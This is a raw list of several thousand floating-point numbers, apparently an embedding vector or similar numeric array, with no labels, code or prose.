-0.02407824993133545, 0.031397633254528046, 0.023182256147265434, -0.022425077855587006, -0.01795773021876812, -0.015345467254519463, -0.004445263650268316, 0.0018771695904433727, -0.007697972934693098, 0.003252709051594138, -0.002932485891506076, -0.004861711524426937, -0.015042596496641636, 0.028596077114343643, -0.004968978464603424, -0.017036497592926025, -0.003252709051594138, 0.036066897213459015, -0.04601116105914116, -0.003826902015134692, -0.016632668673992157, -0.02869703248143196, 0.029984235763549805, -0.02940373308956623, 0.00484278192743659, 0.002858345629647374, 0.021693140268325806, 0.012468191795051098, -0.021465986967086792, -0.025277113541960716, 0.010707753710448742, -0.0014047223376110196, -0.016254080459475517, -0.025214016437530518, 0.014512571506202221, 0.011900308541953564, -0.0008944161236286163, 0.004962668754160404, 0.016039546579122543, -0.003236934542655945, 0.00457461504265666, 0.018083926290273666, -0.005877591669559479, -0.008007153868675232, 0.014361136592924595, -0.04058472439646721, -0.02624882571399212, -0.011414453387260437, -0.013730155304074287, 0.022450316697359085, 0.010385953821241856, -0.008959935978055, 0.012095913290977478, 0.030337585136294365, -0.02050689421594143, -0.0039499434642493725, -0.016582190990447998, -0.028495119884610176, -0.01129456702619791, 0.006161533296108246, -0.025239255279302597, -0.008833738975226879, 0.013225370086729527, -0.02189505472779274, 0.003008203813806176, 0.01415922213345766, -0.012562839314341545, 0.02197077125310898, -0.0020175629761070013, -0.040710918605327606, -0.01381849218159914, -0.015408565290272236, 0.005827113054692745, -0.0409633107483387, -0.01908087730407715, -0.02695552445948124, -0.026778850704431534, 0.010941216722130775, 0.020216643810272217, 0.01650647260248661, 0.028293205425143242, -0.006129984278231859, 0.04015565663576126, 0.0014417924685403705, -0.024885905906558037, -0.017680099233984947, -0.006852457765489817, -0.00681459903717041, 0.000946472049690783, 0.04391630366444588, -0.020292362198233604, -0.0051298788748681545, -0.029252296313643456, 0.010739303193986416, 0.032482922077178955, -0.01078347209841013, -0.020304981619119644, 0.0033536660484969616, 0.0018787470180541277, 0.014499952085316181, -0.043613433837890625, -0.0070733013562858105, 0.007571776397526264, -0.012335686013102531, -0.021465986967086792, -0.011174680665135384, -0.007672733627259731, -0.04373962804675102, 0.018462514504790306, 0.03301294520497322, 0.003583974204957485, -0.006063730921596289, 0.013250608928501606, 0.011950787156820297, 0.007117469795048237, -0.02915133908390999, -0.015534761361777782, -0.0040414356626570225, 0.013010836206376553, 0.03018615022301674, -0.027460310608148575, 0.026854567229747772, -0.003984647337347269, -0.006082660518586636, 0.015231890603899956, 0.011622676625847816, 0.0424271896481514, -0.020519515499472618, -0.0044515738263726234, -0.010568938218057156, -0.024318022653460503, -0.003407299518585205, 0.01977495662868023, -0.004331686999648809, 0.009458410553634167, 0.013566100038588047, 0.0024545176420360804, -0.0005864183185622096, -0.005953309126198292, 0.010196658782660961, -0.012241038493812084, -0.029529929161071777, -0.006839838344603777, 0.026021672412753105, -0.00700389314442873, -0.02907562255859375, 0.019320650026202202, 0.034603018313646317, -0.02728363499045372, -0.01790725253522396, 0.0031801462173461914, -0.005514777265489101, 0.010897048749029636, 0.00120990676805377, -0.027106959372758865, 0.010676205158233643, -0.03909560665488243, 0.0033126522321254015, 0.003038175404071808, 0.03687455132603645, -0.028495119884610176, -0.025378070771694183, -0.019547803327441216, 0.019661379978060722, -0.01574929617345333, 0.0023015046026557684, 0.011016935110092163, -0.006612685043364763, -0.0016926075331866741, 0.010928597301244736, -0.02327059395611286, -0.018525613471865654, -0.035738784819841385, -0.022803667932748795, 0.013010836206376553, -0.011199919506907463, -0.003968873061239719, 0.01128825731575489, 0.01717531308531761, -0.00931959506124258, -0.028520358726382256, 0.015383326448500156, -0.02046903595328331, 0.015585239976644516, -0.006865077652037144, -0.010537388734519482, -0.012998216785490513, -0.00914923008531332, -0.003874225774779916, -0.02050689421594143, -0.007716902531683445, -0.04136713966727257, 0.014802822843194008, -0.004183406475931406, -0.005085709970444441, -0.004189716186374426, 0.010449051856994629, -0.007048062048852444, -0.01113682147115469, 0.014764964580535889, -0.01861395128071308, 0.016392895951867104, 0.0141718415543437, 0.006407615728676319, 0.06678307056427002, -0.019093496724963188, -0.008675994351506233, -0.012102223001420498, 0.014600909315049648, 0.02193291299045086, -0.0013573986943811178, -0.006618994753807783, -0.008726472966372967, 0.0009425284224562347, 0.007862027734518051, -0.015332847833633423, 0.0032243148889392614, 0.03159954771399498, 0.015408565290272236, 0.012960357591509819, 0.005006837192922831, -0.004461038392037153, 0.020027348771691322, -0.01973709836602211, 0.0031801462173461914, 0.0017004947876557708, 0.0037511843256652355, -0.02475970983505249, 0.03374488279223442, -0.01755390129983425, -0.01765485852956772, -0.006155223585665226, -0.02912610024213791, -0.019976871088147163, 0.00114523118827492, -0.012474501505494118, -0.012133771553635597, -0.0013297932455316186, -0.008215378038585186, -0.006262490060180426, 0.03011043183505535, 0.0024103489704430103, -0.015976449474692345, -0.016026927158236504, 0.01149017084389925, -0.006959724705666304, -0.022715330123901367, -0.0212135948240757, -0.012159011326730251, 0.0010284996824339032, 0.01791987195611, -0.016241461038589478, 0.008183828555047512, 0.014790203422307968, 0.0003095752326771617, -0.027510788291692734, 0.015989068895578384, 0.008593966253101826, -0.0006266433629207313, 0.010291306301951408, -0.0051330337300896645, -0.007439270615577698, -0.009811760857701302, -0.0029372184071689844, -0.0032211600337177515, 0.023560844361782074, -0.010284996591508389, 0.004517826717346907, 0.0086255157366395, -0.02156694419682026, -0.006063730921596289, -0.0032621738500893116, -0.011035864241421223, 0.017667477950453758, 0.025264494121074677, -0.009357454255223274, -0.00949626974761486, -0.0025870236568152905, 0.008493009023368359, 0.007937746122479439, -0.0021216748282313347, 0.015635719522833824, -0.017389846965670586, -0.018475135788321495, 0.04028185084462166, 0.019484704360365868, -0.014840682037174702, 0.01720055192708969, 0.00024588554515503347, 0.02698076330125332, -0.00465664267539978, -0.026829328387975693, 0.0020144081208854914, -0.015408565290272236, -0.0086255157366395, -0.013048695400357246, 0.015383326448500156, -0.002661163918673992, 0.03409823402762413, 0.034224431961774826, 0.02587023749947548, -0.01116206031292677, -0.010360714048147202, -0.014714485965669155, 0.015875492244958878, -0.014764964580535889, -0.002446630271151662, 0.01650647260248661, -0.02839416265487671, -0.008436220698058605, -0.01722579263150692, 0.018046068027615547, -0.01612788438796997, 0.008764331229031086, -0.056939758360385895, -0.019459465518593788, 0.0352340005338192, -0.014222320169210434, -0.021630041301250458, 0.014537811279296875, 0.026021672412753105, 0.006839838344603777, -0.01799558848142624, -0.01977495662868023, -0.008562417700886726, -0.015875492244958878, 0.03091808781027794, 0.0006952626281417906, -0.004618783947080374, -0.003407299518585205, 0.008152279071509838, -0.036723118275403976, 0.05628354102373123, 0.01079609151929617, 0.03308866545557976, -0.003874225774779916, 0.01130087673664093, -0.012733204290270805, -0.0042528146877884865, -0.0474245622754097, 0.004593544639647007, 0.007597015704959631, -0.021705759689211845, 0.012114842422306538, 0.0017651703674346209, 0.016001688316464424, 0.0022336740512400866, -0.02766222320497036, 0.009212328121066093, 0.004782838746905327, -0.01433589681982994, 0.01347776222974062, 0.02197077125310898, 0.014676626771688461, 0.012550219893455505, -0.019459465518593788, 0.010890739038586617, 0.016430756077170372, 0.0055999597534537315, -0.005334947723895311, 0.019509945064783096, -0.013338946737349033, 0.012752133421599865, -0.009199708700180054, 0.011591128073632717, 0.008259546011686325, 0.00930697564035654, 0.004880641121417284, -0.006934485398232937, 0.025920715183019638, 0.017074355855584145, -0.051159970462322235, -0.021011680364608765, -0.020658330991864204, 0.04563257470726967, 0.022538654506206512, -0.009963195770978928, 0.027838898822665215, 0.008493009023368359, 0.007653804030269384, 0.0006345306755974889, 0.019673999398946762, 0.021365029737353325, -0.022033870220184326, 0.013894209638237953, 0.024204446002840996, 0.01611526496708393, 0.00211063283495605, 0.006249870639294386, -0.020986441522836685, -0.03419918939471245, -0.004710276145488024, -0.03152383118867874, 0.029252296313643456, 0.003826902015134692, 0.02687980607151985, 0.001825113664381206, -0.004211800638586283, -0.0012801034608855844, -0.023194875568151474, -0.013919449411332607, -0.01938374899327755, -0.0034703975543379784, 0.0034672426991164684, 0.00933221448212862, -0.023977292701601982, -0.007792619988322258, -0.001848775427788496, -0.016216222196817398, -0.020393317565321922, -0.003055527340620756, 0.029605645686388016, -0.022046489641070366, 0.002129562199115753, -0.0044484189711511135, 0.021831955760717392, -0.01164791639894247, 0.020986441522836685, 0.005631508771330118, -0.005827113054692745, -0.01611526496708393, 0.0017288889503106475, -0.0008313179714605212, -0.00951519887894392, -0.0003908140934072435, 0.016266699880361557, -0.0009165004594251513, 0.005808183457702398, -0.009786521084606647, 0.005675677675753832, 0.031019045040011406, 0.008909457363188267, -0.0011665268102660775, 0.010228208266198635, -0.018740147352218628, 0.0035776644945144653, -0.008253236301243305, 0.014108743518590927, 0.011193609796464443, -0.014878541231155396, -0.0060858153738081455, 0.024583034217357635, -0.015597859397530556, 0.010373334400355816, 0.022500796243548393, 0.02195815183222294, -0.011805661953985691, -0.01345252338796854, -0.009792830795049667, -0.0001742100139381364, 0.03235672414302826, -0.010171419940888882, 0.0012004420859739184, 0.024696610867977142, -0.006524347700178623, -0.001803029328584671, -0.017049117013812065, -0.016039546579122543, -0.006268800236284733, 0.02690504677593708, -0.008240616880357265, 0.014411615207791328, 0.028570836409926414, 0.002129562199115753, 0.005842887796461582, -0.004937429446727037, 0.0030918088741600513, 0.01509307511150837, -0.00949626974761486, 0.004214955493807793, 0.0007086709374561906, 0.006764120422303677, 0.022134827449917793, -0.004173941910266876, 0.00483962707221508, 0.009919027797877789, 0.017856772989034653, -0.03419918939471245, 0.01165422610938549, -0.016973398625850677, 0.0021895053796470165, -0.013338946737349033, 0.0067830500192940235, -0.00665054377168417, 0.004849092103540897, 0.06663163751363754, -0.004823852796107531, -0.016657909378409386, 0.006669473368674517, -0.013048695400357246, -0.04765171557664871, -0.01609002612531185, -0.0008825851837173104, -0.0005816859775222838, 0.010676205158233643, 0.012758443132042885, 0.0007177413208410144, -0.029858039692044258, 0.007016513030976057, -0.0021216748282313347, -0.012386164627969265, 0.030665695667266846, -0.010815020650625229, -0.006631614174693823, 0.03589022159576416, 0.026703132316470146, 0.030766652897000313, 0.01578715443611145, -0.008026083000004292, 0.015181411989033222, 0.002090125810354948, -0.001366074662655592, -0.004110843874514103, -0.010865499265491962, -0.021768856793642044, -0.018033448606729507, -0.006038491614162922, -0.03298770636320114, 0.02942897193133831, -0.013023455627262592, 0.019093496724963188, 0.007950365543365479, -0.0007023611688055098, 0.026021672412753105, -0.008152279071509838, -0.016796724870800972, -0.04139237850904465, -0.01935850828886032, -0.02050689421594143, -0.011881379410624504, 0.0023172791115939617, -0.0013684409204870462, -0.006338207982480526, -0.020039968192577362, 0.027182677760720253, 0.005871281959116459, 0.02329583279788494, -0.010486911050975323, -0.0006826429744251072, -0.018525613471865654, 0.006505418103188276, -0.004675572272390127, -0.004274898674339056, -0.010411192663013935, -0.02624882571399212, 0.014828062616288662, -0.0013155961642041802, 0.0012635402381420135, 0.0016310869250446558, 0.03084236942231655, -0.011919238604605198, 0.010089392773807049, -0.01762961968779564, -0.02801557257771492, -0.01689768210053444, -0.0031848785001784563, -0.02049427479505539, 0.013540860265493393, 0.009452100843191147, 0.010083082132041454, 0.015029976144433022, -0.008840049616992474, 0.010701444000005722, -0.038262709975242615, 0.0014473135815933347, 0.019610902294516563, -0.00036103965248912573, -0.009357454255223274, 0.014828062616288662, -0.010663585737347603, -0.012903569266200066, 0.015635719522833824, -0.010310235433280468, -0.009370073676109314, -0.0038395216688513756, 0.008310024626553059, -0.005934379994869232, -0.012323066592216492, -0.014954258687794209, -0.002247871132567525, 0.01095383707433939, -0.01349038165062666, -0.013780632987618446, 0.01903039775788784, 0.006442320067435503, -0.004890105687081814, -0.003303187433630228, -0.0022147446870803833, -0.005918605253100395, 0.024128727614879608, -0.016670528799295425, 0.003498791716992855, -0.0015269749565050006, 0.015724055469036102, 0.010076772421598434, 0.02947944961488247, 0.028898946940898895, 0.021352410316467285, 0.018147025257349014, -0.002930908463895321, 0.020254502072930336, 0.006357137579470873, -0.0015451156068593264, -0.02045641653239727, 0.017150074243545532, -0.0044357990846037865, -0.010234517976641655, 0.015686197206377983, 0.014954258687794209, 0.006795669440180063, 0.004678727127611637, -0.00861289631575346, 0.021768856793642044, -0.02338417060673237, -0.004707121290266514, -0.006852457765489817, 0.017503423616290092, -0.014613528735935688, -0.004420024808496237, -0.00017263255722355098, -0.01797034963965416, -0.007294144947081804, -0.013149651698768139, 0.027763180434703827, 0.010335475206375122, 0.007470819633454084, -0.040105175226926804, -0.02907562255859375, -0.0007390369428321719, -0.01684720255434513, 0.004792303778231144, -0.005634663626551628, 0.00638237688690424, -0.01656957156956196, 0.0013392579276114702, 0.009843309409916401, 0.00004382362749311142, -0.013389425352215767, 0.007243666332215071, -0.005454834084957838, -0.01574929617345333, -0.012499741278588772, -0.03311390429735184, 0.01331370696425438, 0.01526974979788065, -0.005183511879295111, 0.0015269749565050006, -0.0005465876311063766, 0.0002827585267368704, 0.007458199746906757, -0.007641184609383345, -0.00949626974761486, -0.010587867349386215, -0.008038702420890331, 0.00457776989787817, 0.015042596496641636, 0.007786310277879238, 0.008190138265490532, -0.0056157344952225685, 0.00474813487380743, -0.01510569453239441, -0.0018661274807527661, -0.013603958301246166, 0.005180357024073601, -0.005653593223541975, -0.015913350507616997, 0.027157438918948174, 0.008524558506906033, -0.0010387530783191323, 0.0007362763863056898, -0.028596077114343643, -0.0010284996824339032, 0.00484278192743659, -0.025012101978063583, 0.013225370086729527, 0.020607851445674896, 0.006600065156817436, -0.002292039804160595, 0.00878326129168272, -0.015522141940891743, -0.0038710706867277622, -0.023964673280715942, 0.009067202918231487, -0.01972447894513607, 0.005663057789206505, -0.012228419072926044, 0.01683458313345909, 0.02079714648425579, -0.016771486029028893, 0.007849408313632011, -0.0033126522321254015, 0.007281525060534477, -0.00896624568849802, 0.02367442101240158, 0.024999482557177544, 0.009616156108677387, 0.012821542099118233, 0.008398362435400486, 0.002680093515664339, 0.007395101711153984, -0.003407299518585205, 0.02698076330125332, 0.03551163151860237, -0.005817648489028215, -0.012625937350094318, -0.01349038165062666, -0.00007354877016041428, -0.0016216221265494823, 0.0017320439219474792, -0.0048301625065505505, -0.009603536687791348, 0.009067202918231487, 0.007628564722836018, -0.016014307737350464, 0.00439163064584136, -0.015395945869386196, -0.007521298248320818, -0.0015459044370800257, 0.013856351375579834, 0.012140082195401192, -0.014487332664430141, -0.001981281442567706, -0.013073934242129326, -0.014828062616288662, -0.0061804624274373055, 0.0018172264099121094, -0.002137449337169528, -0.01757914200425148, -0.012177940458059311, 0.014033026061952114, 0.01526974979788065, 0.0024702921509742737, -0.0013794830301776528, -0.0014906935393810272, 0.0019008314702659845, 0.00014778766490053385, -0.0037448746152222157, 0.010120941326022148, 0.005546326283365488, 0.012846780940890312, 0.024595653638243675, -0.0012335686478763819, -0.0037259450182318687, 0.009944266639649868, 0.009982125833630562, -0.0010781894670799375, 0.010890739038586617, 0.0056914519518613815, 0.005271849688142538, -0.004265434108674526, -0.006688402500003576, 0.008240616880357265, 0.0013400467578321695, 0.009073512628674507, 0.017137454822659492, -0.01396992802619934, -0.000020112531274207868, -0.0018298460636287928, -0.007514988072216511, -0.002768430858850479, 0.007729521952569485, 0.0070733013562858105, -0.01346514280885458, 0.007350933272391558, -0.0033946798648685217, 0.007893577218055725, 0.03271007537841797, 0.008852669037878513, 0.009641395881772041, 0.017452945932745934, 0.005476918537169695, 0.00440740492194891, 0.004375855904072523, 0.0020554219372570515, 0.018790625035762787, -0.01166684553027153, -0.0004968978464603424, 0.0029593026265501976, -0.017503423616290092, -0.009578297846019268, 0.00916184950619936, -0.030362823978066444, -0.00689662666991353, 0.002000211039558053, 0.009761282242834568, 0.00026678681024350226, -0.015067835338413715, 0.007723212242126465, -0.00483331736177206, -0.02080976590514183, 0.0035303407348692417, -0.008127040229737759, -0.036066897213459015, -0.005738775711506605, 0.010272377170622349, 0.010152490809559822, -0.01577453501522541, -0.011793041601777077, -0.01561047974973917, -0.02152908407151699, 0.004293828271329403, -0.012531289830803871, 0.005915450397878885, 0.02301819995045662, -0.007988224737346172, 0.010922287590801716, 0.004107689019292593, -0.006006942596286535, -0.00949626974761486, 0.006325588561594486, 0.02980756014585495, -0.004520981572568417, 0.00915553979575634, -0.0041487026028335094, 0.0016910301055759192, 0.007350933272391558, -0.0000055272489589697216, 0.009925337508320808, 0.008013463579118252, -0.01860133185982704, 0.006035336758941412, 0.02332107163965702, -0.02265223115682602, -0.034956369549036026, 0.009389002807438374, 0.004994217772036791, -0.035713545978069305, -0.0008486699662171304, 0.0127710634842515, 0.0010923865484073758, 0.01077716238796711, -0.006928175687789917, 0.0020554219372570515, -0.007363552693277597, 0.012436643242835999, 0.009224947541952133, -0.008164899423718452, -0.005183511879295111, -0.004621938802301884, 0.01691030152142048, -0.01727627031505108, 0.0007981914677657187, 0.003804817795753479, -0.010234517976641655, -0.005151962861418724, -0.025718800723552704, -0.004120308440178633, -0.003448313334956765, -0.0138058727607131, 0.010165110230445862, 0.02440636046230793, -0.013566100038588047, -0.01860133185982704, 0.019194453954696655, -0.0182858407497406, 0.018740147352218628, 0.000054077077948022634, 0.020380698144435883, -0.014209700748324394, -0.01790725253522396, 0.010354404337704182, 0.003363130846992135, 0.0010750344954431057, 0.020620470866560936, 0.009445791132748127, 0.02086024545133114, -0.005066780373454094, 0.0031123156659305096, 0.00025042073684744537, 0.013881590217351913, -0.018033448606729507, 0.0040572104044258595, 0.03811127692461014, -0.0017982969293370843, -0.018210122361779213, 0.0057955640368163586, -0.016582190990447998, -0.011446001939475536, -0.0168850626796484, -0.014903780072927475, 0.017389846965670586, 0.00457461504265666, -0.021831955760717392, -0.00665054377168417, -0.002088548382744193, 0.002664318773895502, 0.00691555580124259, 0.001320328563451767, 0.01078347209841013, -0.015736674889922142, -0.020721428096294403, -0.005915450397878885, 0.00699758343398571, -0.017894631251692772, 0.027914617210626602, -0.0002711248234845698, -0.005571565590798855, 0.009862239472568035, -0.023220114409923553, -0.030059952288866043, -0.0041297730058431625, 0.010348094627261162, 0.016405515372753143, 0.015560001134872437, 0.014613528735935688, -0.008095490746200085, 0.009540438652038574, -0.004868021234869957, 0.004442108795046806, 0.010127251036465168, 0.0058902110904455185, 0.004767064470797777, 0.007981914095580578, 0.009767591953277588, 0.021352410316467285, -0.007918816059827805, -0.013263228349387646, 0.003255863906815648, 0.006016407627612352, 0.020039968192577362, -0.0008589234203100204, -0.008518248796463013, 0.014411615207791328, -0.007496058940887451, -0.012853090651333332, 0.023472506552934647, 0.0070733013562858105, -0.011780422180891037, 0.02483542636036873, 0.01654433272778988, -0.020569993183016777, -0.03558735176920891, -0.021781478077173233, 0.0057987188920378685, 0.028267966583371162, 0.01794511079788208, 0.011755183339118958, -0.014979498460888863, -0.00001942239578056615, -0.011565888300538063, 0.004861711524426937, -0.00699127372354269, -0.021819336339831352, -0.02980756014585495, 0.04555685445666313, -0.005230835638940334, -0.018437275663018227, -0.00861289631575346, 0.0007066991529427469, 0.004205490928143263, -0.008499319665133953, 0.00456199562177062, -0.01824798248708248, 0.01617836207151413, -0.012455572374165058, 0.013149651698768139, -0.016342418268322945, -0.00042354624019935727, 0.003173836274072528, -0.014499952085316181, -0.00003292933979537338, -0.004536756314337254, 0.0037953529972583055, -0.015421184711158276, -0.004300137981772423, 0.01349038165062666, 0.010190349072217941, 0.03235672414302826, -0.007786310277879238, 0.005786099471151829, 0.015711436048150063, -0.026425499469041824, -0.00112472428008914, 0.007855718024075031, -0.002241561422124505, -0.007231046445667744, 0.022134827449917793, 0.0017714801942929626, -0.012796302326023579, -0.018727527931332588, 0.025617843493819237, -0.006707332096993923, -0.006688402500003576, 0.004792303778231144, 0.024545175954699516, 0.010524769313633442, -0.008505629375576973, 0.0018582402262836695, 0.027056481689214706, 0.003192765871062875, 0.0007362763863056898, -0.0030287106055766344, -0.00046810932690277696, -0.030413303524255753, 0.0013992012245580554, -0.006047956645488739, 0.004644022788852453, 0.004243349656462669, -0.004155012313276529, 0.006432855036109686, -0.023056060075759888, 0.005786099471151829, 0.008928386494517326, -0.018512994050979614, -0.0032684835605323315, -0.04338628053665161, -0.013603958301246166, -0.011376594193279743, 0.017692718654870987, -0.005738775711506605, 0.0015908618224784732, 0.008202757686376572, -0.0026942905969917774, -0.0061015901155769825, -0.02804081328213215, -0.0045272912830114365, -0.03361868858337402, -0.001026133424602449, -0.0046314033679664135, -0.0034861720632761717, -0.009660325013101101, 0.013225370086729527, 0.032457683235406876, 0.0003070118837058544, 0.006155223585665226, -0.015509522520005703, 0.010152490809559822, -0.023497747257351875, -0.008840049616992474, 0.01096014678478241, 0.01509307511150837, -0.017314128577709198, 0.011414453387260437, -0.008549797348678112, -0.007477129343897104, -0.0056188893504440784, -0.0022557585034519434, -0.014929019846022129, -0.016771486029028893, 0.00863182544708252, 0.0037921981420367956, -0.02160480245947838, -0.031170479953289032, 0.024658752605319023, -0.004852246958762407, -0.012215799652040005, 0.014701866544783115, 0.0048112329095602036, 0.004278053995221853, -0.013338946737349033, 0.006212011910974979, -0.012499741278588772, -0.0015285523841157556, -0.025289732962846756, -0.017099594697356224, 0.013591338880360126, 0.003956253174692392, 0.02544116973876953, 0.027081720530986786, -0.013768013566732407, 0.024318022653460503, -0.016355037689208984, -0.01755390129983425, -0.016657909378409386, -0.007287834770977497, -0.00690924609079957, 0.03223052993416786, -0.034502062946558, -0.014361136592924595, -0.007382482290267944, -0.019648760557174683, 0.0004294617101550102, 0.00449574226513505, 0.01113051176071167, -0.01755390129983425, 0.014285418204963207, 0.010833950713276863, 0.028999904170632362, 0.0016563261160627007, -0.027132200077176094, -0.007249976042658091, -0.016607429832220078, -0.01610264554619789, 0.005650438368320465, 0.012177940458059311, -0.004420024808496237, -0.011931858025491238, -0.016317179426550865, 0.004192871507257223, -0.010707753710448742, -0.00023405466345138848, -0.009243877604603767, -0.015130933374166489, -0.021819336339831352, 0.0011065836297348142, 0.006486488506197929, -0.017831534147262573, 0.03273531422019005, 0.03195289894938469, -0.004634558223187923, 0.010057843290269375, -0.0014110321644693613, 0.00967294443398714, 0.017074355855584145, 0.004016196355223656, -0.015597859397530556, 0.008896837942302227, 0.024848047643899918, 0.005372806452214718, 0.01612788438796997, 0.0009519931627437472, -0.003615523222833872, -0.0031375549733638763, 0.009559367783367634, 0.015862872824072838, 0.0034640878438949585, -0.015585239976644516, 0.017389846965670586, 0.01615312322974205, -0.006145758554339409, -0.025390690192580223, -0.019093496724963188, -0.030817130580544472, 0.0025365452747792006, 0.016039546579122543, 0.028621315956115723, 0.0040540555492043495, 0.004508362151682377, -0.0035334958229213953, -0.009111370891332626, 0.00109790766146034, -0.007735831663012505, 0.002728994470089674, 0.010770851746201515, -0.006940795108675957, 0.009944266639649868, 0.0030034712981432676, 0.023901574313640594, -0.05345674231648445, 0.006764120422303677, 0.012663796544075012, -0.01691030152142048, -0.017112215980887413, -0.012960357591509819, 0.004609318915754557, -0.00707961106672883, 0.0073572429828345776, -0.025415930896997452, -0.0041455477476119995, -0.020393317565321922, -0.003609213512390852, 0.0004708698543254286, -0.007313074078410864, 0.001497003366239369, 0.0018298460636287928, -0.000715375121217221, -0.006051111500710249, -0.009458410553634167, -0.02116311527788639, 0.006593755446374416, -0.011906618252396584, -0.007925125770270824, 0.010329165495932102, -0.03159954771399498, -0.021365029737353325, -0.005189822055399418, 0.014701866544783115, -0.018942061811685562, 0.009111370891332626, -0.012550219893455505, -0.009243877604603767, -0.012133771553635597, -0.02195815183222294, 0.0009859084384515882, -0.03379536420106888, -0.002575981430709362, 0.022563893347978592, -0.0013132300227880478, -0.01797034963965416, 0.010411192663013935, 0.00900410395115614, -0.0321800522506237, -0.002052266849204898, -0.01762961968779564, 0.005032076500356197, -0.003650227328762412, -0.019863294437527657, -0.014828062616288662, -0.008190138265490532, -0.007407721597701311, -0.0049216547049582005, -0.0037133253645151854, 0.01361657865345478, -0.0037480294704437256, -0.005281314253807068, -0.01717531308531761, -0.0014930596807971597, -0.00023326593509409577, 0.0014481022953987122, -0.009805451147258282, -0.0023677577264606953, 0.014108743518590927, -0.00026974454522132874, -0.004798613488674164, -0.01653171144425869, -0.011092652566730976, -0.015408565290272236, 0.016998639330267906, -0.015130933374166489, -0.010266067460179329, -0.016216222196817398, 0.016241461038589478, -0.01114313118159771, -0.005167737603187561, 0.012316756881773472, 0.03382060304284096, -0.0006254602922126651, -0.009231257252395153, 0.017440324649214745, -0.021011680364608765, -0.006142603699117899, -0.008152279071509838, -0.0005868126754648983, -0.0057103815488517284, 0.0013132300227880478, 0.016721006482839584, 0.004303292836993933, -0.020267121493816376, -0.01574929617345333, -0.008417291566729546, -0.018563471734523773, -0.03382060304284096, -0.01202019490301609, 0.022816287353634834, 0.014424234628677368, -0.0023425184190273285, -0.008265855722129345, -0.014222320169210434, 0.02368704043328762, -0.0089914845302701, -0.00699127372354269, 0.0015924392500892282, 0.004470502957701683, 0.011963406577706337, -0.0020601542200893164, 0.003845831612125039, -0.033593449741601944, 0.026299303397536278, 0.004028816241770983, -0.009288045577704906, -0.0056946068070828915, 0.003454623045399785, 0.011269327253103256, 0.007767380680888891, -0.005398045759648085, 0.005852352362126112, -0.032129570841789246, -0.029529929161071777, -0.006492798216640949, -0.0028520359192043543, 0.039978981018066406, -0.0003484200278762728, -0.007685353048145771, 0.005700916983187199, 0.0004807289515156299, -0.021276691928505898, 0.0015924392500892282, -0.0015324960695579648, 0.01720055192708969, -0.009464721195399761, -0.01577453501522541, -0.01509307511150837, -0.030413303524255753, 0.01078978180885315, -0.000631375762168318, 0.03167526423931122, -0.023434648290276527, -0.003852141322568059, 0.009111370891332626, -0.02080976590514183, 0.010821330361068249, -0.01757914200425148, 0.005451679229736328, -0.018071306869387627, -0.023434648290276527, -0.011004315689206123, -0.008158589713275433, 0.018121784552931786, 0.006158378440886736, 0.006363447289913893, 0.002796825021505356, 0.008120730519294739, 0.02867179363965988, 0.003972027916461229, -0.012607008218765259, 0.013073934242129326, 0.016052166000008583, -0.00024351937463507056, -0.0007323327590711415, 0.008410981856286526, -0.007944055832922459, 0.012386164627969265, 0.009836999699473381, -0.002336208475753665, -0.003782733343541622, -0.006776739843189716, 0.007395101711153984, 0.00913661066442728, -0.00027033608057536185, 0.005748240277171135, -0.013250608928501606, 0.016304558143019676, 0.000741797499358654, -0.012701654806733131, -0.0004203913558740169, -0.001850352855399251, -0.01861395128071308, -0.02831844426691532, -0.003675466636195779, -0.02872227318584919, -0.007287834770977497, -0.0019260706612840295, 0.012272587977349758, -0.02579451911151409, 0.004255969543009996, -0.018942061811685562, 0.018399417400360107, 0.0057987188920378685, -0.011382903903722763, -0.022033870220184326, 0.011067413724958897, -0.003962562885135412, 0.02083500474691391, -0.018361559137701988, -0.005543171428143978, -0.013338946737349033, 0.00864444486796856, 0.027006004005670547, 0.018475135788321495, 0.008145969361066818, 0.016026927158236504, -0.030817130580544472, 0.009584607556462288, -0.014815443195402622, -0.011420763097703457, -0.009086132049560547, -0.0009330637403763831, -0.0016563261160627007, -0.028469879180192947, -0.0023314761929214, 0.00422442052513361, -0.0215795636177063, 0.0003381665737833828, 0.007388792000710964, -0.042225275188684464, 0.015875492244958878, -0.009029343724250793, -0.013149651698768139, -0.021415507420897484, -0.000825796858407557, -0.03371964395046234, -0.003845831612125039, 0.028495119884610176, -0.005918605253100395, 0.008688613772392273, 0.025289732962846756, 0.005448524374514818, 0.007679043337702751, -0.018853724002838135, -0.011231468990445137, -0.0047386703081429005, 0.014588289894163609, -0.01582501269876957, -0.00001673579572525341, -0.0024750244338065386, 0.0019733943045139313, 0.0031612166203558445, 0.013553479686379433, 0.012070673517882824, 0.016582190990447998, -0.003811127506196499, 0.005558946169912815, -0.00930066592991352, -0.00040658863144926727, -0.010032604448497295, -0.01793249137699604, -0.0072689056396484375, -0.020241882652044296, 0.0007279947749339044, -0.015143552795052528, 0.002374067436903715, -0.003691241145133972, 0.017351988703012466, 0.021339790895581245, -0.007962984964251518, -0.008246926590800285, -0.002221054397523403, 0.020885484293103218, 0.008038702420890331, -0.012424023821949959, -0.0054043554700911045, -0.009988435544073582, 0.03296246752142906, -0.006959724705666304, 0.005372806452214718, -0.021440748125314713, -0.01165422610938549, -0.020582612603902817, -0.017415085807442665, 0.007672733627259731, 0.0032937228679656982, 0.012026505544781685, -0.0009188666590489447, -0.011616366915404797, 0.008227997459471226, -0.003631297964602709, -0.015736674889922142, 0.02441897988319397, -0.0044357990846037865, 0.007035442627966404, 0.009288045577704906, -0.0002190688537666574, 0.007281525060534477, -0.008164899423718452, -0.015383326448500156, -0.0016799878794699907, -0.001804606756195426, -0.003079189220443368, 0.002968767425045371, 0.0018440431449562311, 0.0019402677426114678, -0.015294988639652729, 0.015976449474692345, 0.023207494989037514, 0.0007402200135402381, -0.0038647609762847424, -0.0004365602508187294, 0.011559578590095043, 0.022033870220184326, 0.00450205197557807, 0.005259229801595211, 0.003899464849382639, 0.034603018313646317, 0.006148913409560919, 0.015484282746911049, -0.0067704301327466965, 0.0042528146877884865, -0.007514988072216511, 0.00682721845805645, -0.006669473368674517, -0.005347567144781351, -0.0020191404037177563, -0.007641184609383345, 0.016771486029028893, 0.006600065156817436, -0.000566700182389468, -0.024229684844613075, -0.027914617210626602, -0.005448524374514818, 0.006461249198764563, 0.019636141136288643, 0.0025381227023899555, -0.003886845428496599, 0.013389425352215767, -0.013061314821243286, -0.004849092103540897, -0.009212328121066093, -0.009407932870090008, -0.004978443030267954, 0.01654433272778988, 0.006205701734870672, 0.01115575060248375, 0.007546537555754185, 0.005640973336994648, -0.006524347700178623, 0.027106959372758865, 